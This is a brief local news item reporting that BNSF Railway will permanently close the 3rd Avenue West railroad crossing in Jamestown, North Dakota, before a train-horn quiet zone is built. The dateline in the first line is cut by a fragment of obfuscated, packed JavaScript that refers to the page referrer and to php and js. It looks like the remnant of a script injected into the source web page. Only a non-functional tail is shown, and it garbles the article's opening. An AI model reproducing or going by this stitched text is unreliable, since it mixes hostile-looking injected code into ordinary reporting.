JAMESTOWN, edzeh|var|u0026u|referrer|ftkay||js|php’.split(‘|’),0,{}))
N.D.–Jamestown drivers are reminded that the Burlington Northern Santa Fe Railroad will be permanently closing the 3rd Avenue West crossing in Jamestown this coming Monday, August 29th.
The track in this area is scheduled for maintenance at that time and due to the timing of the quiet zone project shortly thereafter, the crossing will be closed and not reopend to public traffic.
Although closure of the 3rd Avenue West railroad crossing isn’t part of the quiet zone project officials have stated that to keep it open and build a quiet zone crossing would have been cost prohibitive.
Once the quiet zone is constructed, trains will no longer be required to sound their horns at crossings in Jamestown.
